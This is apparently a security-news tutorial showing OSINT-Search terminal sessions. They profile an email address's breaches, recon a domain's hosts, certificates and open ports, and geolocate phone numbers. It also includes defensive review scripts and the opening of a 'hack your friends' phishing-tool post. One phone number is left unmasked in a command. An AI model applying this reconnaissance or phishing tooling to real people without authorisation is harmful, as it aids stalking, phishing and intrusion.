root@kali:~/Downloads/OSINT-Search# pip3 install git+https://github.com/abenassi/Google-Search-API --upgrade
Collecting git+https://github.com/abenassi/Google-Search-API
Cloning https://github.com/abenassi/Google-Search-API to /tmp/pip-req-build-b5sd1rin
Requirement already satisfied, skipping upgrade: beautifulsoup4 in /usr/lib/python3/dist-packages (from Google-Search-API==1.1.14) (4.6.3)
Requirement already satisfied, skipping upgrade: fake-useragent in /usr/local/lib/python3.7/dist-packages (from Google-Search-API==1.1.14) (0.1.11)
Requirement already satisfied, skipping upgrade: future in /usr/lib/python3/dist-packages (from Google-Search-API==1.1.14) (0.15.2)
Requirement already satisfied, skipping upgrade: requests in /usr/lib/python3/dist-packages (from Google-Search-API==1.1.14) (2.20.0)
Requirement already satisfied, skipping upgrade: selenium<3.0.0,>=2.44.0 in /usr/local/lib/python3.7/dist-packages (from Google-Search-API==1.1.14) (2.53.6)
  • Type pip3 install https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip --user
root@kali:~/Downloads/OSINT-Search# pip3 install https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip --user
Collecting https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip
Downloading https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip
\ 266kB 21.3MB/s
Collecting bs4 (from dnsdumpster==0.5)
Downloading https://files.pythonhosted.org/packages/10/ed/7e8b97591f6f456174139ec089c769f89a94a1a4025fe967691de971f314/bs4-0.0.1.tar.gz
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from dnsdumpster==0.5) (2.20.0)
  • Type python3 osintS34rCh.py
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
[-] The following procedure is necessary in order to save your API keys…
[-] Hit enter if you don't have the keys.
[-] The data will be written into a file called [/osintSearch.config.ini] that can be edited by you after.
[?] What is your PIPL API key?
  • From here, enter the API keys, which are obtained from the following URLs.
  • Create an account at each of the following URLs and copy their API keys into the required fields of osintS34rCh.py
https://pipl.com/api
https://www.opencnam.com
https://www.shodan.io
https://whatcms.org/API
https://censys.io/register
https://dashboard.fullcontact.com/consents
  • After copying type python3 osintS34rCh.py
[?] What is your PIPL API key?
gm#####################yj9
[?] What is your FullContact API key?
Uh############H9rPOez###########sz
[?] What is your CNAM SID?
AC1##############88d73e0##########
[?] What is your CNAM AUTH_TOKEN?
A###############c403d9############fe5
[?] What is your Shodan API key?
a###############wlcjD###################rM
[?] What is your WhatCMS API key?
2##########################ac5376ef9f2d##################ce2c40#######d2
[?] What is your Censys API id?
6#######8-####-4723-####-#########bc4e
[?] What is your Censys API secret?
###############2HyMxEOYrY##############
[?] What is your TowerData API key?
c6###################3b09a0############aa8a
  • Type python3 osintS34rCh.py -h
 root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -h
osintS34rCh v1.0

USAGES
   Email
   ./osintS34rCh -e                                # All Searches: Pipl, FullContact, Haveibeenpwnded Data Breaches and Credentials Pastes, TowerData - validate e-mail
   ./osintS34rCh -e  --pipl                        # Pipl

Domain
   ./osintS34rCh.py -t                                   # All Searches: Shodan Recon, crt.sh, DNSDumpster, All Google Hacking Dorks, HackerTarget - DNS Zonetransfer
   ./osintS34rCh.py -t  --shodan                         # Shodan Recon

IP
   ./osintS34rCh.py -t                                       # All Searchs: Shodan and Censys Recon
   ./osintS34rCh.py -t  --shodan                             # Shodan Recon

URL
   ./osintS34rCh.py -u                                      # WhatCMS Check, HackerTarget - Extract URLs
   ./osintS34rCh.py -u  --cms                               # WhatCMS Check

Find Email IDs

  • Type python3 osintS34rCh.py -e abh#########a6##@gmail.com --pwned
  • -e is used to search for information about email addresses.
  • abh#########a6##@gmail.com is the target email ID. For security we have hidden the email ID; it was created specifically for the cyber forensics classes of International Institute of Cyber Security.
  • --pwned is the query to search for any data breach involving the address.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -e abh##########a6##@gmail.com --pwned
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Data Breaches Results
[@] Target: abh###########a6##@gmail.com
[*] Data breach: Digimon
[*] Title: Digimon
[*] Domain: digimon.co.in
[*] Date of the breach: 2016-09-05
[*] Number of accounts breached: 7687679
[*] Description: In September 2016, over 16GB of logs from a service indicated to be digimon.co.in were obtained, most likely from an unprotected Mongo DB instance. The service ceased running shortly afterwards and no information remains about the precise nature of it. Based on enquiries made via Twitter, it appears to have been a mail service possibly based on PowerMTA and used for delivering spam. The logs contained information including 7.7M unique email recipients (names and addresses), mail server IP addresses, email subjects and tracking information including mail opens and clicks.
[*] Logo image from Digimon: https://haveibeenpwned.com/Content/Images/PwnedLogos/Email.png
[*] Data breached: Email addresses
[*] Data breached: Email messages
[*] Data breached: IP addresses
[*] Data breached: Names
[*] Data breach: Dubsmash
[*] Title: Dubsmash
[*] Domain: dubsmash.com
[*] Date of the breach: 2018-12-01
[*] Number of accounts breached: 161749950
[*] Description: In December 2018, the video messaging service Dubsmash suffered a data breach. The incident exposed 162 million unique email addresses alongside usernames and PBKDF2 password hashes. In 2019, the data appeared listed for sale on a dark web marketplace (along with several other large breaches) and subsequently began circulating more broadly. The data was provided to HIBP by a source who requested it to be attributed to "BenjaminBlue@exploit.im".
[*] Logo image from Dubsmash: https://haveibeenpwned.com/Content/Images/PwnedLogos/Dubsmash.png
[*] Data breached: Email addresses
[*] Data breached: Geographic locations
[*] Data breached: Names
[*] Data breached: Passwords
[*] Data breached: Phone numbers
[*] Data breached: Spoken languages
[*] Data breached: Usernames
[*] Data breach: MySpace
[*] Title: MySpace
[*] Domain: myspace.com
[*] Date of the breach: 2008-07-01
[*] Number of accounts breached: 359420698
[*] Description: In approximately 2008, MySpace suffered a data breach that exposed almost 360 million accounts. In May 2016 the data was offered up for sale on the "Real Deal" dark market website and included email addresses, usernames and SHA1 hashes of the first 10 characters of the password converted to lowercase and stored without a salt. The exact breach date is unknown, but analysis of the data suggests it was 8 years before being made public.
[*] Logo image from MySpace: https://haveibeenpwned.com/Content/Images/PwnedLogos/MySpace.png
[*] Data breached: Email addresses
[*] Data breached: Passwords
[*] Data breached: Usernames
[*] Data breach: Tumblr
[*] Title: tumblr
[*] Domain: tumblr.com
[*] Date of the breach: 2013-02-28
[*] Number of accounts breached: 65469298
[*] Description: In early 2013, tumblr suffered a data breach which resulted in the exposure of over 65 million accounts. The data was later put up for sale on a dark market website and included email addresses and passwords stored as salted SHA1 hashes.
[*] Logo image from Tumblr: https://haveibeenpwned.com/Content/Images/PwnedLogos/Tumblr.png
[*] Data breached: Email addresses
[*] Data breached: Passwords
  • The above output shows there are 3 data breaches associated with the above email ID. The first one is the Dubsmash messaging application.
  • This video messaging application experienced a data breach in December 2018 involving over 162 million email addresses. Later, data containing usernames & password hashes was sold on the dark web.
  • The second is an old but still effective data breach of MySpace. MySpace is a popular social networking site offering photos, music, video and submissions from network friends. As per the above data, this site's data was also found on sale on the "Real Deal" dark market website, including usernames, password hashes and email addresses.
  • The third is the Tumblr breach, in which around 65 million accounts were exposed and later put on sale on a dark market.

Find Hosts, Public Keys of Target

  • Type python3 osintS34rCh.py -t certifiedhacker.com
  • -t is used for searching information related to a domain.
  • certifiedhacker.com is the target site.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -t certifiedhacker.com
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Shodan Results
[@] Target: certifiedhacker.com
[!] Shodan: information about certifiedhacker.com was not found.

-> CRT.sh Results
[@] Target: certifiedhacker.com
[-] URL: https://crt.sh/?q=%25certifiedhacker.com
[*] Issuer CA ID: 16418
[*] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
[*] Name: events.certifiedhacker.com
[*] Logged At: 2019-03-07T17:07:30.61
[*] Not before: 2019-03-07T16:07:29
[*] Not after: 2019-06-05T16:07:29
[*] Issuer CA ID: 16418
[*] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
[*] Name: fleet.certifiedhacker.com
[*] Logged At: 2019-03-07T17:07:30.61
[*] Not before: 2019-03-07T16:07:29
[*] Not after: 2019-06-05T16:07:29
[*] Issuer CA ID: 16418
[*] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
[*] Name: iam.certifiedhacker.com
[*] Logged At: 2019-03-07T17:07:30.61
[*] Not before: 2019-03-07T16:07:29
[*] Not after: 2019-06-05T16:07:29

-> DNSdumpster Results
[@] Target: certifiedhacker.com
[*] DNS Servers
Domain: ns2.bluehost.com.
IP: 162.159.25.175
Reverse DNS: ns2.bluehost.com
AS: AS13335
ISP: Cloudflare Inc
Country: United States
Header:
Domain: ns1.bluehost.com.
IP: 162.159.24.80
Reverse DNS: ns1.bluehost.com
AS: AS13335
ISP: Cloudflare Inc
Country: United States
Header:
[*] MX Records
Domain: 0 mail.certifiedhacker.com.
IP: 162.241.216.11
Reverse DNS: box5331.bluehost.com
AS: AS20013
ISP: CyrusOne LLC
Country: United States
Header: mail.certifiedhacker.com.
[*] TXT Records
"v=spf1 a mx ptr include:bluehost.com ?all"
[*] Host Records
Domain: soc.certifiedhacker.com
IP: 162.241.216.11
Reverse DNS: box5331.bluehost.com
AS: AS20013
ISP: CyrusOne LLC
Country: United States
Header: nginx/1.12.2
HTTPS: nginx/1.12.2
FTP: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------//220-You are user number 1 of 150 allowed.//220-Local time is now 23:54. Server port: 21.//220-IPv6 connections are also welcome on this server.//220 You will be disconnected after 15 minutes of inactivity.
SSH: SSH-2.0-OpenSSH_5.3
TCP8080: nginx/1.12.2
Domain: www.soc.certifiedhacker.com
IP: 162.241.216.11
Reverse DNS: box5331.bluehost.com
AS: AS20013
ISP: CyrusOne LLC
Country: United States
Header: nginx/1.12.2
HTTPS: nginx/1.12.2
FTP: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------//220-You are user number 1 of 150 allowed.//220-Local time is now 23:54. Server port: 21.//220-IPv6 connections are also welcome on this server.//220 You will be disconnected after 15 minutes of inactivity.
SSH: SSH-2.0-OpenSSH_5.3
TCP8080: nginx/1.12.2
Domain: itf.certifiedhacker.com
IP: 162.241.216.11
Reverse DNS: box5331.bluehost.com
AS: AS20013
ISP: CyrusOne LLC
Country: United States
Header: nginx/1.12.2
HTTPS: nginx/1.12.2
FTP: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------//220-You are user number 1 of 150 allowed.//220-Local time is now 23:54. Server port: 21.//220-IPv6 connections are also welcome on this server.//220 You will be disconnected after 15 minutes of inactivity.
SSH: SSH-2.0-OpenSSH_5.3
TCP8080: nginx/1.12.2

-> Zone Transfer Results
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> axfr @ns2.bluehost.com certifiedhacker.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> axfr @ns1.bluehost.com certifiedhacker.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
  • The above output shows Shodan was unable to find anything about the target site. crt.sh then found the names matching the target site: crt.sh shows the domains & sub-domains of the target website. crt.sh searches Certificate Transparency logs, which were developed to increase the security of public key certificates by making every issuance publicly auditable.
  • When we open the first link from crt.sh, it shows the associated names matching the target site (certifiedhacker.com).
  • The above link shows the same names as certifiedhacker.com. Opening the first link shows the public key of the URL, with Let's Encrypt Authority as the issuer common name.

————————————————–SNIP———————————————

  • Further, it shows the certificates issued for the URL, and then the validation status of the URL. "Valid" means the certificate passed validation for every purpose checked.
  • Most URLs in crt.sh show the same validation results.
  • DNSdumpster is designed to search for discovered hosts related to a domain. DNSdumpster finds all the hosts that are visible to attackers.
  • In the above output, DNSdumpster has gathered 5 host records & other domains of the target site. There are numerous ways to gather the hosts of any domain; we have shown how NSLOOKUP is used to gather different hosts.
  • Then it shows the different domains of the target site with their reverse DNS, country, IP address, ISP & the header returned by each service.
  • The above OSINT search output has gathered different records which can be used in further scanning methods.
  • Finally it shows the name servers in the zone transfer results, but it was unable to transfer any part of the zone file.
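As an added example (not part of OSINT-Search or this article), the Python script below does what the owner of a domain would do with the crt.sh and DNSdumpster sections above: it groups the crt.sh fields back into one record per logged certificate, lists the sub-domains the Certificate Transparency logs reveal, reports which certificates have passed their "Not after" date, and parses the SPF TXT record to judge how strictly it protects the domain against forged senders. The sample input is constructed from the output shown above; the field parser assumes the tool's "[*] Key: value" line format (it also accepts several fields on one line), which is an assumption about this tool rather than something the article documents.

```python
import re
from datetime import datetime

# Constructed sample in the shape of the crt.sh section of the osintS34rCh
# output shown above.
SAMPLE_CRT = """\
[*] Issuer CA ID: 16418
[*] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
[*] Name: events.certifiedhacker.com
[*] Logged At: 2019-03-07T17:07:30.61
[*] Not before: 2019-03-07T16:07:29
[*] Not after: 2019-06-05T16:07:29
[*] Issuer CA ID: 16418
[*] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
[*] Name: fleet.certifiedhacker.com
[*] Logged At: 2019-03-07T17:07:30.61
[*] Not before: 2019-03-07T16:07:29
[*] Not after: 2019-06-05T16:07:29
[*] Issuer CA ID: 16418
[*] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
[*] Name: iam.certifiedhacker.com
[*] Logged At: 2019-03-07T17:07:30.61
[*] Not before: 2019-03-07T16:07:29
[*] Not after: 2019-06-05T16:07:29
"""

# Constructed sample: the SPF record from the DNSdumpster TXT section above.
SAMPLE_SPF = '"v=spf1 a mx ptr include:bluehost.com ?all"'

# One "[*] Key: value" field; a field ends at the next "[*]" or at end of line.
FIELD_RE = re.compile(r"\[\*\]\s*([^:]+?):\s*(.*?)(?=\s\[\*\]|$)")


def parse_cert_entries(text):
    """Group the key/value fields into one dict per logged certificate.
    A new record starts at each 'Issuer CA ID' field (assumed to be how the
    tool begins every crt.sh entry)."""
    entries, current = [], None
    for line in text.splitlines():
        for key, value in FIELD_RE.findall(line):
            key = key.strip()
            if key == "Issuer CA ID":
                current = {}
                entries.append(current)
            if current is not None:
                current[key] = value.strip()
    return entries


def subdomains(entries):
    """Distinct host names the CT logs reveal for the domain."""
    return sorted({e["Name"] for e in entries if "Name" in e})


def expired_certs(entries, now_iso):
    """Names whose logged certificate had already expired at now_iso."""
    now = datetime.fromisoformat(now_iso)
    return [e["Name"] for e in entries
            if "Not after" in e and datetime.fromisoformat(e["Not after"]) < now]


def assess_spf(record):
    """Split an SPF record into its mechanisms and judge the 'all' qualifier
    (RFC 7208: '+' pass, '-' fail, '~' softfail, '?' neutral)."""
    terms = record.strip().strip('"').split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    mechanisms, all_qualifier = [], None
    for term in terms[1:]:
        qualifier, body = "+", term
        if term[0] in "+-~?":
            qualifier, body = term[0], term[1:]
        if body.lower() == "all":
            all_qualifier = qualifier
        else:
            mechanisms.append(body)
    verdict = {"-": "fail", "~": "softfail", "?": "neutral",
               "+": "pass", None: "missing"}[all_qualifier]
    warnings = []
    if all_qualifier in ("+", "?", None):
        # Neutral, pass or absent: receivers get no instruction that would
        # make them reject mail from a host the record does not list.
        warnings.append(f"'all' is {verdict}: unlisted senders are not rejected")
    if any(m.lower().startswith("ptr") for m in mechanisms):
        warnings.append("'ptr' mechanism is deprecated by RFC 7208 (slow and unreliable)")
    return {"mechanisms": mechanisms, "all_qualifier": all_qualifier,
            "verdict": verdict, "warnings": warnings}


if __name__ == "__main__":
    entries = parse_cert_entries(SAMPLE_CRT)
    print("sub-domains from CT logs:", subdomains(entries))
    print("expired as of 2019-07-01:", expired_certs(entries, "2019-07-01"))
    print("SPF assessment:", assess_spf(SAMPLE_SPF))
```

For the record shown above, "?all" is neutral, so a receiving server is told nothing that would make it reject a message claiming to come from the domain; "-all" (or at least "~all") together with DKIM and a DMARC policy is what a domain owner would want to see after such a review.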

Finding Open Ports

  • Type python3 osintS34rCh.py -t 162.241.216.11
  • -t is used to enter an IP address.
  • 162.241.216.11 is the target IP address.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -t 162.241.216.11
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Shodan Results
[@] Target: 162.241.216.11
[*] City: Provo
[*] Country: United States
[*] Postal Code: 84606
[*] Longitude: -111.6133
[*] Latitude: 40.21809999999999
[*] Operation System: None
[*] Organization: CyrusOne LLC
[*] ISP: Unified Layer
[*] Port: 465
[*] Port: 443
[*] Port: 2096
[*] Port: 8080
[*] Port: 995
[*] Port: 993
[*] Port: 22
[*] Port: 587
[*] Port: 53
[*] Port: 25
[*] Port: 80
[*] Port: 2222
[*] Port: 2087
[*] Port: 5432
[*] Port: 2082
[*] Port: 2083
[*] Port: 26
[*] Hostname: box5331.bluehost.com

-> Censys Results
[*] IP: 162.241.216.11
[*] Protocol: 80/http
[*] Protocol: 3306/mysql
[*] Protocol: 8080/http
[*] Protocol: 993/imaps
[*] Protocol: 465/smtp
[*] Protocol: 995/pop3s
[*] Protocol: 110/pop3
[*] Protocol: 21/ftp
[*] Protocol: 143/imap
[*] Protocol: 53/dns
[*] Protocol: 587/smtp
[*] Protocol: 443/https
[*] Protocol: 22/ssh
[*] Protocol: 5432/postgres
[*] Country: United States
[*] Registered Country: United States
[*] Longitude: -111.6442
[*] Latitude: 40.2342
[*] Continent: North America
[*] Timezone: America/Denver
[*] AS Name: UNIFIEDLAYER-AS-1 - Unified Layer
[*] AS Country Code: US
[*] AS Description: UNIFIEDLAYER-AS-1 - Unified Layer

[*] Service: https/443
[*] Certificate DNS Names: ['*.bluehost.com', 'bluehost.com']
[*] Issued By: {'common_name': ['COMODO RSA Domain Validation Secure Server CA'], 'country': ['GB'], 'locality': ['Salford'], 'province': ['Greater Manchester'], 'organization': ['COMODO CA Limited']}
[*] Service: dns/53
[*] Open Resolver: True
[*] Lookup Answers: {'type': 'A', 'name': 'c.afekv.com', 'response': '162.241.216.11'}

[*] Updated at: 2019-05-01T08:18:45+00:00
  • The above output shows the open ports from Shodan, along with the registered country and longitude & latitude.
  • Shodan has found the open ports of the target site. Ports found running services with known vulnerabilities can be used in further footprinting methods.
  • Censys has also found the commonly listed ports which are used in information gathering methods.
  • All these techniques are part of the curriculum of the ethical hacking classes of International Institute of Cyber Security.
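The Shodan and Censys sections above are the view an outsider gets of a host, which is exactly the view its owner should compare against what they intended to expose. As an added example (not part of OSINT-Search or this article), the Python script below parses the two port listings, merges them, compares the result with a hypothetical allowlist of services the owner of a shared web/mail host expects to be reachable, and calls out the items that most need a decision: database ports reachable from the internet, a DNS server that answers recursive queries for anyone, and services that only one of the two scanners saw. The sample input is constructed from the output shown above; the allowlist is an assumption made for the example.

```python
import re

# Constructed sample in the shape of the Shodan section shown above.
SAMPLE_SHODAN = """\
[*] Port: 465
[*] Port: 443
[*] Port: 2096
[*] Port: 8080
[*] Port: 995
[*] Port: 993
[*] Port: 22
[*] Port: 587
[*] Port: 53
[*] Port: 25
[*] Port: 80
[*] Port: 2222
[*] Port: 2087
[*] Port: 5432
[*] Port: 2082
[*] Port: 2083
[*] Port: 26
[*] Hostname: box5331.bluehost.com
"""

# Constructed sample in the shape of the Censys section shown above.
SAMPLE_CENSYS = """\
[*] IP: 162.241.216.11
[*] Protocol: 80/http
[*] Protocol: 3306/mysql
[*] Protocol: 8080/http
[*] Protocol: 993/imaps
[*] Protocol: 465/smtp
[*] Protocol: 995/pop3s
[*] Protocol: 110/pop3
[*] Protocol: 21/ftp
[*] Protocol: 143/imap
[*] Protocol: 53/dns
[*] Protocol: 587/smtp
[*] Protocol: 443/https
[*] Protocol: 22/ssh
[*] Protocol: 5432/postgres
[*] Service: dns/53
[*] Open Resolver: True
"""

# Hypothetical allowlist: what the owner of a shared web/mail host intends to
# expose to the internet.  Anything outside it needs a justification.
EXPECTED_PORTS = {22, 25, 80, 443, 465, 587, 993, 995}

# Services that should never be reachable directly from the internet.
DATABASE_SERVICES = {"mysql", "postgres", "mssql", "mongodb", "redis"}

PORT_RE = re.compile(r"\[\*\]\s*Port:\s*(\d+)")
PROTO_RE = re.compile(r"\[\*\]\s*Protocol:\s*(\d+)/(\w+)")


def shodan_ports(text):
    """Sorted list of the ports Shodan reports open."""
    return sorted({int(p) for p in PORT_RE.findall(text)})


def censys_services(text):
    """Mapping port -> protocol name from the Censys protocol list."""
    return {int(port): name for port, name in PROTO_RE.findall(text)}


def review_exposure(shodan_text, censys_text, expected=EXPECTED_PORTS):
    """Merge both scanners' views and compare them with the allowlist."""
    ports = set(shodan_ports(shodan_text))
    services = censys_services(censys_text)
    observed = ports | set(services)
    unexpected = sorted(observed - expected)
    findings = [
        f"port {p} ({services.get(p, 'service unknown')}) is reachable but not in the allowlist"
        for p in unexpected
    ]
    for port, name in sorted(services.items()):
        if name in DATABASE_SERVICES:
            findings.append(f"database service {name} on port {port} is exposed to the internet")
    if re.search(r"Open Resolver:\s*True", censys_text):
        findings.append("port 53 answers recursive queries from anyone (open resolver): "
                        "abusable for DNS amplification; restrict recursion to own clients")
    return {
        "observed": sorted(observed),
        "unexpected": unexpected,
        # Seen by one scanner only: scan results are snapshots, so confirm
        # these directly before acting on them.
        "only_shodan": sorted(ports - set(services)),
        "only_censys": sorted(set(services) - ports),
        "findings": findings,
    }


if __name__ == "__main__":
    for finding in review_exposure(SAMPLE_SHODAN, SAMPLE_CENSYS)["findings"]:
        print("-", finding)
```

The point of keeping "only_shodan" and "only_censys" separate is that neither scanner is authoritative: Shodan listed the cPanel ports (2082, 2083, 2087, 2096) and 2222 that Censys did not, while Censys saw MySQL on 3306 that Shodan did not, so a review that relied on one source alone would have missed something.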

Extracting URLs

  • Type python3 osintS34rCh.py -u certifiedhacker.com
  • -u is used to enter a domain name.
  • certifiedhacker.com is the target domain name.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -u certifiedhacker.com
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Extract URLs Results
Visible links
https://certifiedhacker.com/
https://certifiedhacker.com/images/icons/lock-and-key-110.png
https://certifiedhacker.com/
https://certifiedhacker.com/sample-login.html
https://certifiedhacker.com/P-folio/index.html
https://certifiedhacker.com/images/slideshow/slide-1.png
https://certifiedhacker.com/Online Booking/index.htm
https://certifiedhacker.com/images/slideshow/slide-2.png
https://certifiedhacker.com/corporate-learning-website/01-homepage.html
https://certifiedhacker.com/images/slideshow/slide-3.png
https://certifiedhacker.com/Real Estates/index.html
https://certifiedhacker.com/images/slideshow/slide-4.png
https://certifiedhacker.com/Recipes/index.html
https://certifiedhacker.com/images/slideshow/slide-5.png
https://certifiedhacker.com/Social Media/index.html
https://certifiedhacker.com/images/slideshow/slide-6.png
https://certifiedhacker.com/Turbo Max/index.htm
https://certifiedhacker.com/images/slideshow/slide-7.png
https://certifiedhacker.com/Under Construction/index.html
https://certifiedhacker.com/images/slideshow/slide-8.png
https://certifiedhacker.com/Under the trees/index.html
https://certifiedhacker.com/images/slideshow/slide-9.png
https://certifiedhacker.com/
  • After scanning with the URL query, OSINT-Search has gathered all the links of the target site. The above links can be used in further footprinting methods.

Finding Details of Mobile Numbers

  • Type python3 osintS34rCh.py -p +919####677## --callerID
  • -p is used to enter a phone number; --callerID is the query.
  • +919####677## is the target mobile number. For security, the mobile number is hidden. Mobile number forensics is an essential topic of the cyber forensics classes of International Institute of Cyber Security.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p +918071992699 --callerID
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Caller ID Results
[*] Number: +919####677##
[*] Country: DELHI IN
  • The above output shows the current location of the mobile number. The output can be used in the initial phase of the footprinting/reconnaissance method.
  • Type python3 osintS34rCh.py -p +919####254## --callerID
  • -p is used to enter a phone number; --callerID is the query.
  • +919####254## is the target mobile number. For security, the mobile number is hidden.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p +919####254##  --callerID
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Caller ID Results
[*] Number: +919####254##
[*] Country: DELHI IN
  • The above output shows the current location of the mobile number. The output can be used in the initial phase of the footprinting/reconnaissance method.
  • Type python3 osintS34rCh.py -p +52#########78 --callerID
  • -p is used to enter a phone number; --callerID is the query.
  • +52#########78 is the target mobile number. For security, the mobile number is hidden.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p+52#########78  --callerID
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Caller ID Results
[*] Number: +52#########78
[*] Country: VARRERA
  • The above output shows the current location of the mobile number. The output can be used in the initial phase of the footprinting/reconnaissance method.
  • Type python3 osintS34rCh.py -p +52########02 --callerID
  • -p is used to enter a phone number; --callerID is the query.
  • +52########02 is the target mobile number. For security, the mobile number is hidden.
root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p +52########02 --callerID
              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/
-> Caller ID Results
[*] Number: +52########02
[*] Country: MIGUEL HIDAL MX
  • The above output shows the current location of the mobile number. The output can be used in the initial phase of the footprinting/reconnaissance method.
  • Any unknown number can be checked to see which country it belongs to.

The post Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step) appeared first on Information Security Newspaper | Hacking News.

Send fake mail to hack your friends https://www.securitynewspaper.com/2019/05/01/send-fake-mail-to-hack-your-friends/ Wed, 01 May 2019 15:50:07 +0000 https://www.securitynewspaper.com/?p=14888

The post Send fake mail to hack your friends appeared first on Information Security Newspaper | Hacking News.

Social engineering is a trick to make people enter credentials on malicious web pages by manipulating human interaction with a basic level of security. According to an ethical hacking researcher of International Institute of Cyber Security (IICS), social engineering attacks are popular because not everyone is aware of basic security. Most attacks contain social engineering methods. While investigating such cases, the cyber forensics team of International Institute of Cyber Security (IICS) found that most attacks are done using social engineering tricks. These attacks are performed after gathering information about the target. Today, while communicating over the internet, many of us rely on email. Email phishing is the most common attack done nowadays. We will show you how you can generate fake phishing mails in a couple of minutes.

  • For testing we are using Kali Linux 2019.1 amd64. We are testing this tool on a live boot of Kali Linux 2019.1 amd64.

Installation :-

  • For cloning type git clone https://github.com/Dionach/PhEmail.git
root@kali:~/Downloads# git clone https://github.com/Dionach/PhEmail.git
Cloning into 'PhEmail'…
remote: Enumerating objects: 88, done.
remote: Total 88 (delta 0), reused 0 (delta 0), pack-reused 88
Unpacking objects: 100% (88/88), done.
  • Type cd PhEmail
root@kali:~/Downloads# cd PhEmail/
  • Type ./phemail.py
root@kali:~/Downloads/PhEmail# ./phemail.py
PHishing EMAIL tool v0.13
Usage: phemail.py [-e ] [-m ] [-f ] [-r ] [-s ] [-b ]
-e emails: File containing list of emails (Default: emails.txt)
-f from_address: Source email address displayed in FROM field of the email (Default: Name Surname name_surname@example.com)
-r reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname name_surname@example.com)
-s subject: Subject of the email (Default: Newsletter)
-b body: Body of the email (Default: body.txt)
-p pages: Specifies number of results pages searched (Default: 10 pages)
-v verbose: Verbose Mode (Default: false)

Usage of Phemail :-

